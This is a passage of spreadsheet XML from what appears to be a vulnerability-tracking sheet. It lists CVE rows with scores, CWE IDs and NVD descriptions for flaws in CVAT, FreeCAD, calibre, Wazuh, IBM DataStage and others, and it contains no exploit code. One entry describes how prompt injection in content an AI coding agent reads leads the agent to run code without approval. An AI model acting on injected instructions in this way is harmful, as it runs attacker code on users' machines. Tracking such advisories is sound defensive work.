      <c r="M512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62246</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65986</t>
        </is>
      </c>
      <c r="C513" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E513" s="5" t="inlineStr"/>
      <c r="F513" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G513" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr">
        <is>
          <t>CWE-434, CWE-79</t>
        </is>
      </c>
      <c r="L513" s="5" t="inlineStr">
        <is>
          <t>CVAT is an open source interactive video and image annotation tool for computer vision. Versions 2.5.0 through 2.66.0 contain a XSS vulnerability that can be accessed through annotation guide assets. When CVAT serves the files attached to an annotation guide, it labels them with a media type ( Content-Type ) that the attacker can influence, so instead of treating an uploaded file as plain data, the victim's browser can be told to treat it as an HTML page and run any JavaScript inside it. This issue has been fixed in version 2.67.0.</t>
        </is>
      </c>
      <c r="M513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65986</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67609</t>
        </is>
      </c>
      <c r="C514" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E514" s="5" t="inlineStr"/>
      <c r="F514" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G514" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L514" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain a privilege escalation vulnerability that allows attackers with access to the apache account to execute arbitrary commands as root by exploiting an insecure sudoers configuration in /etc/sudoers.d/telenia. The configuration grants the apache user NOPASSWD execution of /bin/nice, which can be leveraged to invoke arbitrary commands, enabling full root-level command execution without supplying a password.</t>
        </is>
      </c>
      <c r="M514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67609</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6958</t>
        </is>
      </c>
      <c r="C515" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E515" s="5" t="inlineStr"/>
      <c r="F515" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G515" s="5" t="inlineStr">
        <is>
          <t>windows, openssl</t>
        </is>
      </c>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L515" s="5" t="inlineStr">
        <is>
          <t>Acunetix 25.11.251107123 for Windows contains a local privilege escalation vulnerability in the Web Vulnerability Scanning Engine (wvsc.exe) that allows low-privileged local attackers to execute arbitrary code as SYSTEM by exploiting a missing hardcoded directory path for OpenSSL-related files. Attackers can create the missing directory, place a malicious file at the expected path, and cause the SYSTEM-level wvsc.exe process to load and execute it, resulting in full privilege escalation.</t>
        </is>
      </c>
      <c r="M515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6958</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73233</t>
        </is>
      </c>
      <c r="C516" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E516" s="5" t="inlineStr"/>
      <c r="F516" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G516" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L516" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, the FEM Displacement Constraint task dialog in src/Mod/Fem/Gui/TaskFemConstraintDisplacement.cpp passes the xDisplacementFormula, yDisplacementFormula, and zDisplacementFormula fields of a Fem::ConstraintDisplacement object through TaskDlgFemConstraintDisplacement::accept() into Gui::Command::doCommand. The escaping helper neutralizes quotation marks but not backslashes, allowing crafted formula text to terminate the generated Python string and execute arbitrary Python code with the FreeCAD process's privileges when a victim accepts the dialog. This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73233</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73248</t>
        </is>
      </c>
      <c r="C517" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E517" s="5" t="inlineStr"/>
      <c r="F517" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G517" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L517" s="5" t="inlineStr">
        <is>
          <t>calibre is an e-book manager. Prior to 9.12.0, calibre processes attacker-controlled composite_template metadata from a malicious EPUB, OPF, PDF, or similar file through program: and a nested template() call whose formatter does not inherit allow_python_templates=False, allowing a nested python: template to reach compile_python_template and execute arbitrary Python code when the file is opened or imported. This issue is fixed in version 9.12.0.</t>
        </is>
      </c>
      <c r="M517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73248</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74860</t>
        </is>
      </c>
      <c r="C518" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E518" s="5" t="inlineStr"/>
      <c r="F518" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G518" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L518" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxml2 with Python bindings enabled. A remote attacker could exploit this vulnerability by providing a specially crafted XML document containing a Document Type Definition (DTD) with enumerated attribute values. This triggers a double-free error in the SAX attributeDecl callback handler, where a string is freed twice. This flaw can lead to a denial of service (DoS) due to a reproducible crash in Python applications using the libxml2 SAX bindings.</t>
        </is>
      </c>
      <c r="M518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75858</t>
        </is>
      </c>
      <c r="C519" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E519" s="5" t="inlineStr"/>
      <c r="F519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G519" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L519" s="5" t="inlineStr">
        <is>
          <t>CodeWhale (packages codewhale / codewhale-tui) versions &gt;= 0.8.41 and &lt; 0.8.64 contain a remote code execution vulnerability in the rlm_eval tool. The tool's approval_requirement() returns ApprovalRequirement::Auto, which the engine treats as 'never prompt,' causing arbitrary model-supplied Python code to run in a python3 interpreter without consulting the user's configured --approval-policy and without any approval prompt or audit step. An attacker can induce the agent to execute arbitrary code via prompt injection in untrusted content the agent reads (a web page, fetched URL, repository file, or MCP tool result); the companion rlm_open tool can stage such content. Code runs on the user's machine at the user's privilege level. Fixed in 0.8.64.</t>
        </is>
      </c>
      <c r="M519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75858</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="C520" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E520" s="5" t="inlineStr"/>
      <c r="F520" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G520" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L520" s="5" t="inlineStr">
        <is>
          <t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t>
        </is>
      </c>
      <c r="M520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80112</t>
        </is>
      </c>
      <c r="C521" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E521" s="5" t="inlineStr"/>
      <c r="F521" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G521" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L521" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an improper access control vulnerability in the DirectIo64.sys kernel driver that allows unprivileged local users to perform privileged hardware operations by opening a handle to the device object created without a security descriptor. Attackers can issue IOCTLs through the permissive default Windows ACL applied to the device to access restricted hardware operations regardless of privilege or integrity level.</t>
        </is>
      </c>
      <c r="M521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80112</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80378</t>
        </is>
      </c>
      <c r="C522" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E522" s="5" t="inlineStr"/>
      <c r="F522" s="5" t="inlineStr"/>
      <c r="G522" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to improper authorization.</t>
        </is>
      </c>
      <c r="M522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80378</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80436</t>
        </is>
      </c>
      <c r="C523" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E523" s="5" t="inlineStr"/>
      <c r="F523" s="5" t="inlineStr"/>
      <c r="G523" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L523" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service by deleting arbitrary RabbitMQ queues or exchanges due to improper authorization.</t>
        </is>
      </c>
      <c r="M523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80436</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81207</t>
        </is>
      </c>
      <c r="C524" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E524" s="5" t="inlineStr"/>
      <c r="F524" s="5" t="inlineStr"/>
      <c r="G524" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L524"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M524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81207</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81540</t>
        </is>
      </c>
      <c r="C525" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E525" s="5" t="inlineStr"/>
      <c r="F525" s="5" t="inlineStr"/>
      <c r="G525" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L525" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to overwrite ruleset files belonging to other tenants due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81540</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84226</t>
        </is>
      </c>
      <c r="C526" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E526" s="5" t="inlineStr"/>
      <c r="F526" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G526" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L526" s="5" t="inlineStr">
        <is>
          <t>OpenVPN version 2.5.0 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows local authenticated users to perform a binary planting attack during network configuration steps</t>
        </is>
      </c>
      <c r="M526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84226</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85656</t>
        </is>
      </c>
      <c r="C527" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E527" s="5" t="inlineStr"/>
      <c r="F527" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G527" s="5" t="inlineStr">
        <is>
          <t>java, log4j</t>
        </is>
      </c>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L527" s="5" t="inlineStr">
        <is>
          <t>An OS command injection issue in the log4j-cve-2021-44228-hotpatch package in Amazon Linux before 1.3-9 might allow a local user to execute arbitrary commands with root privileges via a Java process whose executable path contains embedded newline characters.</t>
        </is>
      </c>
      <c r="M527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85656</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86095</t>
        </is>
      </c>
      <c r="C528" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E528" s="5" t="inlineStr"/>
      <c r="F528" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G528" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L528" s="5" t="inlineStr">
        <is>
          <t>Unidata netcdf-c through 4.10.1 contains an out-of-bounds write vulnerability in NC4_HDF5_inq_attname() that copies HDF5 attribute names into a fixed 256-byte buffer without length validation. Attackers can craft HDF5 files with oversized attribute names to overflow the destination buffer, causing memory corruption and crashes when applications enumerate attribute names.</t>
        </is>
      </c>
      <c r="M528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86095</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88886</t>
        </is>
      </c>
      <c r="C529" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E529" s="5" t="inlineStr"/>
      <c r="F529" s="5" t="inlineStr"/>
      <c r="G529" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L529"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M529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88886</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88889</t>
        </is>
      </c>
      <c r="C530" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E530" s="5" t="inlineStr"/>
      <c r="F530" s="5" t="inlineStr"/>
      <c r="G530" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L530" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the Maven Wrapper manager that allows attackers to execute arbitrary commands by specifying a malicious distributionType parameter in maven-wrapper.properties. Attackers can inject shell commands through unescaped distributionType values to achieve remote code execution when Renovate processes Maven Wrapper updates in binarySource=docker mode.</t>
        </is>
      </c>
      <c r="M530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88889</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89049</t>
        </is>
      </c>
      <c r="C531" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E531" s="5" t="inlineStr"/>
      <c r="F531" s="5" t="inlineStr"/>
      <c r="G531" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-918</t>
        </is>
      </c>
      <c r="L531" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery issue due to improper validation of equivalent address representations in the port forwarding to remote hosts functionality in Amazon AWS Systems Manager Agent (SSM Agent) before 3.3.4851.0 on all platforms might allow an authenticated remote user to bypass the remote destination denylist and reach link-local endpoints, potentially obtaining the temporary IAM role credentials of a managed instance and acting with that role's permissions from outside the instance, via a crafted destination host value that uses an alternate representation of a denied link-local address.
To remediate this issue, users should upgrade to version 3.3.4851.0 or later.</t>
        </is>
      </c>
      <c r="M531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89049</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9854</t>
        </is>
      </c>
      <c r="C532" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E532" s="5" t="inlineStr"/>
      <c r="F532" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G532" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H532" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="I532" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="L532" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 RBAC mechanism where users having access to the engineering tools could elevate their privileges to administrator level on the underlying Windows host, granting themselves full control over the host machine.</t>
        </is>
      </c>
      <c r="M532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9854</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44901</t>
        </is>
      </c>
      <c r="C533" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E533" s="5" t="inlineStr"/>
      <c r="F533" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G533" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L533" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta2, AffectedItemsWazuhResult.merge() in framework/wazuh/core/results.py trusts the sort_casting field in a cluster worker's JSON response. During a distributed API merge, attacker-controlled type names are resolved through Python builtins without an allowlist. A compromised worker can set sort_casting to exec and place Python source in affected_items, causing the master to execute the payload as root when responses from multiple nodes are merged. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44901</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47764</t>
        </is>
      </c>
      <c r="C534" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E534" s="5" t="inlineStr"/>
      <c r="F534" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G534" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
